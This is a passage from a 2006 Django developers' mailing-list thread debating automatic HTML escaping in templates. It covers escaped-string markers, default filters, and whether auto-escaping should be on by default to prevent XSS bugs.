url-encoded strings. If necessary. I find myself creating links almost completely with template tags, and they
would care about the actual encoding.

> So here's another idea to throw into the soup:
>
> Having the context aware of the primary escaping needs of the output is
> a nice idea, but as James Bennett pointed out, the template is what
> should be making the decision.

I still don't see why. The programmer who has assembled the string should know best
whether it is already escaped or not, (and usually it isn't). The template might know when
to escape an unescaped string, but it can't know if this is a piece of html that should
be left as is.

Note that the escaping does not happen in the context, but during rendering, so that template filters
and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.

> Suppose the template render had a
> "default filter" that would get applied to all otherwise unfiltered
> output? Obviously, the default value for this would be
> django.template.defaultfilters.escape -- but it could be set to
> another filter for JSON output, or to None for plain text. One
> possible mechanism for doing this would be a {% default_filter ... %}
> tag in the template...?

That's fine with the proposal. Just have the "default filter" check whether this is already escaped
or not.
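A rough sketch of that check, assuming a marker class along the lines of the `escaped` class from the wiki proposal. The names `Escaped` and `default_filter` are made up for illustration and are not taken from any actual implementation.

```python
from html import escape


class Escaped(str):
    """Marker type: a string that is already safe to emit as HTML."""


def default_filter(value):
    """Escape plain values at render time; leave marked strings untouched."""
    if isinstance(value, Escaped):
        return value
    return Escaped(escape(str(value)))


user_input = default_filter("<i>hello</i>")           # plain string: escaped
prebuilt = default_filter(Escaped("<i>hello</i>"))    # marked string: kept
twice = default_filter(default_filter("a & b"))       # never double-escaped
```

Because the result is itself marked, running the filter again is harmless, which is what lets it sit at the end of every variable's filter chain.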

> Assuming the default, then {{name}} would be the equivalent of
> {{name|escape}}, whereas <a href="{{myurl|urlencode}}"> would remain
> unchanged, and a new filter "raw" (just a pass-thru) could be used for
> situations like <script>{{myscript|raw}}</script>.

Or: {% autoescape off %}<script>{{myscript}}</script>{% endautoescape %}
Or: write a simple template tag {% script %} if you need this a lot.

>
> The main drawback I see with this is that the behaviour of
> {{mylist|count}} is not obviously unescaped. Perhaps having all output
> piped through the default filter unless it is piped through the "raw"
> filter (which could perhaps be handled using Michael's escaped
> strings)?

Michael

Simon Willison

Jun 20, 2006, 7:48:32 AM6/20/06
to django-d...@googlegroups.com
On 20 Jun 2006, at 12:02, Todd O'Bryan wrote:
> Couldn't we do something less invasive/complicated?
>
> How about
>
> {{ var }}
>
> by default escapes the contents (in other words, the very first
> filter called on a variable is escape, by default) and
>
> {{ var|raw }}
>
> skips the call to escape?

This doesn't interact well with many filters - things like urlize or
markdown or any of the filters that expect non-escaped content. They
either have to unescape stuff that is fed to them (nasty) or you need
to manually chain a 'raw' filter in before them (also nasty).
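To make the ordering problem concrete, here is a small sketch using a hypothetical `truncate` filter as a simpler stand-in for urlize or markdown. It only assumes Python's standard `html.escape`.

```python
from html import escape


def truncate(text, length):
    """Hypothetical filter: cut text to at most `length` characters."""
    return text[:length]


title = "Q&A <draft>"

# Escape first, then filter: the cut lands inside the "&amp;" entity.
escaped_first = truncate(escape(title), 5)

# Filter first, then escape: the filter sees the original characters.
escaped_last = escape(truncate(title, 5))
```

With escaping applied first, the filter operates on entities instead of characters and produces the broken fragment `Q&amp`; with escaping applied last, the output is the well-formed `Q&amp;A &lt;`.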

> It breaks backwards compatibility, but maybe there's a way to avoid
> that with a setting of some sort. (Say AUTO_ESCAPE=false in
> settings.py for people who don't want the change.)

As discussed previously, I'm dead against a global setting because
they completely kill application portability. PHP's magic quotes
global setting is a great example of this - for a long time there
were apps that expected it to be on and others that expected it to be
off and as a result you couldn't mix and match code.

There are some links to previous discussions on this stuff at the
bottom of http://code.djangoproject.com/wiki/AutoEscaping .

Cheers,

Simon

Simon Willison

Jun 20, 2006, 7:49:23 AM6/20/06
to django-d...@googlegroups.com

On 20 Jun 2006, at 12:15, Michael Radziej wrote:

> Perhaps it's also a good idea to add an attribute `raw` to the
> class `escaped`, so that
> you can always access the raw string when it is necessary. In some
> circumstances, such
> as when you pass a complete html table in the context, this could
> simply raise an error.

I'm not sure that this would be a problem. That's why I want to get a
branch up and running - a lot of the problems with this stuff are
hard to predict until you're running actual code.

Cheers,

Simon

adurdin

Jun 20, 2006, 8:48:34 AM6/20/06
to Django developers
Michael Radziej wrote:

>
> adurdin wrote:
>
> You could simply encode the URL, as you currently need to do anyway, and then mark it as escaped.

True.

> > Having the context aware of the primary escaping needs of the output is
> > a nice idea, but as James Bennett pointed out, the template is what
> > should be making the decision.
>
> I still don't see why. The programmer who has assembled the string should know best
> whether it is already escaped or not, (and usually it isn't). The template might know when
> to escape an unescaped string, but it can't know if this is a piece of html that should
> be left as is.

Not at all -- the template author will know based on the source of the
string, and can make an appropriate decision as to whether it should be
passed through raw or not. Although having thought more about this, I
can't see that it offers any benefit over your intelligent
auto-escaping apart from being explicit in the template. The real
benefit of that is probably a matter of opinion.


Regardless, there's another situation that will most likely arise that
needs to be discussed in your proposal: A string of escaped text is to
be rendered with *further* escaping. What should happen for {{
escaped_str|escape }}? One use case for this is a page with both a
preview and an edit field for HTML content:

{{ page_html }}
<textarea>{{ page_html|escape }}</textarea>

Nothing difficult to solve here, just aiming for completeness.


> Note that the escaping does not happen in the context, but during rendering, so that template filters
> and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.

One thing that bothered me about the proposal was having the
auto-escape property set in the context; which I believe is the wrong
place; it should be set in the Template instance (or subclass). A
context should be reusable between different templates (e.g. an html
page, a JSON object, an XML page).
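As an illustration of the reuse argument, the sketch below renders one context two ways. The functions `render_html` and `render_json` are hypothetical stand-ins for two templates with different escaping needs; the point is only that the escaping choice lives with the output format, not with the data.

```python
import json
from html import escape

# One context, holding unescaped data only.
context = {"name": 'Tom & "Jerry"'}


def render_html(ctx):
    """Stand-in for an HTML template: HTML-escapes on output."""
    return "<p>%s</p>" % escape(ctx["name"])


def render_json(ctx):
    """Stand-in for a JSON template: JSON-encodes on output."""
    return json.dumps({"name": ctx["name"]})


html_page = render_html(context)
json_page = render_json(context)
```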

Andrew

Michael Radziej

Jun 20, 2006, 9:26:08 AM6/20/06
to django-d...@googlegroups.com
Hey Andrew!

adurdin wrote:
> Michael Radziej wrote:
>> adurdin wrote:
>>> Having the context aware of the primary escaping needs of the output is
>>> a nice idea, but as James Bennett pointed out, the template is what
>>> should be making the decision.
>> I still don't see why. The programmer who has assembled the string should know best
>> whether it is already escaped or not, (and usually it isn't). The template might know when
>> to escape an unescaped string, but it can't know if this is a piece of html that should
>> be left as is.
>
> Not at all -- the template author will know based on the source of the
> string, and can make an appropriate decision as to whether it should be
> passed through raw or not.

Now this is probably the most important point, the one our discussion boils down to.

IMO, the point of auto-escaping is that the template author should not have to worry about
the origin of the string, but about how he uses it. The origin of the string in the
context can change, just for an example. Or are we talking about different meanings
of the word 'origin'? I'm really not sure if I understand you correctly.

> Although having thought more about this, I
> can't see that it offers any benefit over your intelligent
> auto-escaping apart from being explicit in the template. The real
> benefit of that is probably a matter of opinion.

Hmm ... who's the one who does the intelligent auto-escaping, that's the point.
I consider it the job of the programmer, you consider it the job of the template
author. I say that the template author does not know or perhaps not even understand
where the string comes from and whether it is escaped or not; you say the template author
knows best what he uses.

It would be nice to get the opinion of somebody like Jeff Croft or Wilson Miner on this.
Do any of you follow the developers' list?


> Regardless, there's another situation that will most likely arise that
> needs to be discussed in your proposal: A string of escaped text is to
> be rendered with *further* escaping. What should happen for {{
> escaped_str|escape }}? One use case for this is a page with both a
> preview and an edit field for HTML content:
>
> {{ page_html }}
> <textarea>{{ page_html|escape }}</textarea>
>
> Nothing difficult to solve here, just aiming for completeness.

That's a good one! You need either:

- something to turn an escaped_string into string
- something like "really_really_escape_this"
- a template filter like "html_source" that escapes a string twice and an escaped_string once.

I'm feeling inclined towards the third option. Any use case for another layer of escaping? Then I'd really scratch my head.
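The third option could look roughly like this. It is a sketch only: `Escaped` is an assumed marker class for already-escaped strings and `html_source` is the hypothetical filter name from the list above.

```python
from html import escape


class Escaped(str):
    """Marker type for strings already safe to emit as HTML (assumed)."""


def html_source(value):
    """Return markup that displays the HTML source of `value`."""
    if isinstance(value, Escaped):
        # Already HTML: one round of escaping shows its source.
        return Escaped(escape(value))
    # Plain text: the first round turns it into HTML,
    # the second round shows that HTML's source.
    return Escaped(escape(escape(str(value))))


from_html = html_source(Escaped("<b>hi</b>"))
from_text = html_source("a < b")
```

In the preview-plus-textarea case, `{{ page_html }}` would render the marked string untouched, while `{{ page_html|html_source }}` inside the textarea would show its markup for editing.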


>> Note that the escaping does not happen in the context, but during rendering, so that template filters
>> and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.
>
> One thing that bothered me about the proposal was having the
> auto-escape property set in the context; which I believe is the wrong
> place; it should be set in the Template instance (or subclass). A
> context should be reusable between different templates (e.g. an html
> page, a JSON object, an XML page).

As long as you don't put any escaped_strings into the context, the context can be used anywhere.
But as soon as you put any html-escaped stuff into it, you (as programmer) have restricted
the usage of the context. Thus, I don't see a problem here.

Do you agree, or do you see anything I don't?

Michael

Adrian Holovaty

Jun 20, 2006, 9:36:05 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Simon Willison <swil...@gmail.com> wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

I've gotta say, I don't like the concept of auto-escaping on by
default. I'd rather not have the framework automatically munging my
data behind my back: it'd be a case of the same type of magic that we
removed in the magic-removal branch. In-bulk escaping should be an
opt-in thing, not an opt-out thing.

Adrian

--
Adrian Holovaty
holovaty.com | djangoproject.com

James Bennett

Jun 20, 2006, 9:56:44 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Adrian Holovaty <holo...@gmail.com> wrote:
> I've gotta say, I don't like the concept of auto-escaping on by
> default. I'd rather not have the framework automatically munging my
> data behind my back: it'd be a case of the same type of magic that we
> removed in the magic-removal branch. In-bulk escaping should be an
> opt-in thing, not an opt-out thing.

I'm 100% in agreement. Most of Simon's proposal looks good to me,
except that I'd want to see autoescape off by default.

Michael Radziej

Jun 20, 2006, 10:11:10 AM6/20/06
to django-d...@googlegroups.com
Adrian Holovaty wrote:
> On 6/20/06, Simon Willison <swil...@gmail.com> wrote:
>> I've written up a proposal for how we can implement auto escaping
>> while hopefully keeping most people happy:
>>
>> http://code.djangoproject.com/wiki/AutoEscaping
>
> I've gotta say, I don't like the concept of auto-escaping on by
> default. I'd rather not have the framework automatically munging my
> data behind my back: it'd be a case of the same type of magic that we
> removed in the magic-removal branch. In-bulk escaping should be an
> opt-in thing, not an opt-out thing.

<sarcasm>
You're against automatically quoting your data in the database driver?
Let's rip it out, bad magic that munges your data behind your back.
</sarcasm>

I haven't used the magical versions of Django, but I regard the magic that
has magically imported models as a different thing. In every framework things
happen automatically, and just calling it "bad magic" is something that
might result in ending the discussion, but I personally don't consider this
a pretty good argument.

But, looking at the recent bugs in the Admin:

2006, __str__() output not escaped in breadcrumbs and filters
2152, username was not escaped

Perhaps neither of these would be fixed with auto-escaping. But I want to
emphasize that bugs like this happen all the time, are hard to spot and
are inherently dangerous. If you escape too much, you'll spot it easily,
and not much harm has been done.

Automatic quoting in the database layer is great, and does a tremendous job
stopping sql injection bugs. Automatic escaping in the template would be
just as good to stop XSS bugs.
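The analogy can be sketched side by side using only the Python standard library. Here `sqlite3` stands in for whichever database driver is in use, and `html.escape` stands in for a template-level escape step; neither is meant as Django's actual code path.

```python
import sqlite3
from html import escape

name = "Robert'); DROP TABLE users;--"

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
# The value is bound as a parameter; it is never spliced into the SQL text.
conn.execute("INSERT INTO users (name) VALUES (?)", (name,))
stored = conn.execute("SELECT name FROM users").fetchone()[0]

comment = "<script>alert(1)</script>"
# The analogous step for HTML output: escape at the point of rendering.
rendered = "<p>%s</p>" % escape(comment)
```

In both cases the hostile input survives as data: the row stores the full string, and the page shows the script tag as text instead of running it.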

Michael

Adrian Holovaty

Jun 20, 2006, 10:25:58 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Michael Radziej <m...@noris.de> wrote:
> <sarcasm>
> You're against automatically quoting your data in the database driver?
> Let's rip it out, bad magic that munges your data behind your back.
> </sarcasm>

I figured somebody might bring up this example, but it isn't quite
analogous. With a database query, you don't really care what the
textual output (SQL) is. With a template, you do.

Simon Willison

Jun 20, 2006, 10:43:32 AM6/20/06
to django-d...@googlegroups.com

On 20 Jun 2006, at 15:11, Michael Radziej wrote:

> But, looking at the recent bugs in the Admin:
>
> 2006, __str__() output not escaped in breadcrumbs and filters
> 2152, username was not escaped
>
> Perhaps neither of these would be fixed with auto-escaping. But I
> want to
> emphasize that bugs like this happen all the time, are hard to spot
> and
> are inherently dangerous. If you escape too much, you'll spot it
> easily,
> and not much harm has been done.

This is exactly why I'm for auto escaping - these bugs sneak in all
over the place; they aren't something that only affects careless or
newbie developers. I bet there's a bunch hiding in the current Django
source code.

If we did have it as an opt-in thing rather than being turned on by
default we'd also have to include a bunch of stuff in the docs saying
"we really, really strongly suggest that you opt-in to this".

I'm actually on the fence as to having it on by default - my gut
feeling is that it's a good idea, since every framework ever that
hasn't done it has been plagued by XSS problems. That said, I don't
think we can get a really good feel for how it works in practise
until we can actually play with working code - which is why I want to
build it in a branch (until we're sure that it works nicely it
definitely shouldn't be inflicted on people following trunk).

Cheers,

Simon